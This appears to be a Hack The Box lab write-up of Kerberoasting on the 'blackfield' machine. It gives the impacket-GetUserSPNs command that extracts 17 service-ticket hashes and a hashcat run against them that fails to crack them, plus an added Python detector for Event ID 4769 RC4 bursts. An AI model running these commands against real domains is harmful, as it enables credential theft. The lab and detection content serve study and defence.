Kerberoasting


Kerberoasting is an attack in which an adversary targets service tickets granted by the Key Distribution Center (KDC) in a Kerberos authentication system. The attacker requests service tickets for specific service accounts and attempts to crack the encrypted Ticket Granting Service (TGS) tickets offline, seeking to obtain plaintext credentials. The attack takes advantage of weak encryption used to protect service tickets, potentially enabling the adversary to compromise user accounts.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=support@dc01.blackfield.local.ccache impacket-GetUserSPNs BLACKFIELD.LOCAL/@dc01.blackfield.local -no-pass -k -request -usersfile users.txt -outputfile kerberoasting.hash -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[...REDACTED...]

Using the TGT of the support user, the “kerberoast-able” accounts can be Kerberoasted, extracting the TGS hashes and saving them to a file.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ wc -l kerberoasting.hash                  
19 kerberoasting.hash

With the exception of the machine account and krbtgt, a total of 17 TGS hashes were extracted via Kerberoasting.
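On the domain controller, the request burst above is recorded as a run of Event ID 4769 entries from a single account with ticket encryption type 0x17 (RC4). The detection logic below is an added example, not part of the original write-up; the flattened event dictionaries, the svc_example* service names, the alice user, and the window and threshold values are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23, the type hashcat mode 13100 targets

def is_roastable_request(ev):
    """True for a successful RC4 ticket request for a user-backed service."""
    svc = ev["ServiceName"].lower()
    return (ev["EventID"] == 4769 and ev["Status"] == "0x0"
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$") and svc != "krbtgt")

def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=5):
    """Map each account to the most distinct services it requested RC4 tickets
    for inside `window`, keeping accounts that reach `threshold` (both assumed)."""
    per_account = defaultdict(list)
    for ev in filter(is_roastable_request, events):
        when = datetime.fromisoformat(ev["TimeCreated"])
        per_account[ev["TargetUserName"]].append((when, ev["ServiceName"]))
    alerts = {}
    for account, reqs in per_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:  # slide window start
                start += 1
            distinct = len({svc for _, svc in reqs[start:end + 1]})
            if distinct >= threshold:
                alerts[account] = max(alerts.get(account, 0), distinct)
    return alerts

def sample_events():
    """Constructed 4769 records: a 17-ticket burst and one ordinary user."""
    base = datetime(2023, 12, 21, 10, 40)
    def ev(secs, user, svc, etype):
        return {"EventID": 4769, "Status": "0x0", "TargetUserName": user,
                "ServiceName": svc, "TicketEncryptionType": etype,
                "TimeCreated": (base + timedelta(seconds=secs)).isoformat()}
    burst = [ev(i, "support@BLACKFIELD.LOCAL", f"svc_example{i:02d}", "0x17")
             for i in range(17)]
    burst += [ev(17, "support@BLACKFIELD.LOCAL", "DC01$", "0x12"),
              ev(18, "support@BLACKFIELD.LOCAL", "krbtgt", "0x12")]
    normal = [ev(i * 600, "alice@BLACKFIELD.LOCAL", "svc_example01", "0x17")
              for i in range(6)]  # constructed user: same service, 10 min apart
    return burst + normal

if __name__ == "__main__":
    print(detect_kerberoasting(sample_events()))
```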

Password Cracking (fail)


┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat --show kerberoasting.hash
The following 2 hash-modes match the structure of your input hash:
 
      # | Name                                                       | Category
  ======+============================================================+======================================
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol

It detects etype 18 due to the machine account and krbtgt. I will be ignoring those 2.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat -a 0 -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashfile 'kerberoasting.hash' on line 1 ($krb5t...e44ff4d49a5659343cc96a2f4540d7bc): Separator unmatched
Hashfile 'kerberoasting.hash' on line 2 ($krb5t...fbcbd444d07baba903db60258a729810): Separator unmatched
Hashes: 17 digests; 17 unique digests, 17 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: kerberoasting.hash
Time.Started.....: Thu Dec 21 10:45:00 2023 (1 min, 31 secs)
Time.Estimated...: Thu Dec 21 10:46:31 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2596.6 kH/s (0.91ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/17 (0.00%) Digests (total), 0/17 (0.00%) Digests (new), 0/17 (0.00%) Salts
Progress.........: 243854562/243854562 (100.00%)
Rejected.........: 0/243854562 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:16 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121736578796269746368] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 67%
 
Started: Thu Dec 21 10:44:58 2023
Stopped: Thu Dec 21 10:46:31 2023

hashcat was unable to crack those 17 TGS hashes. It seems to be a dead end.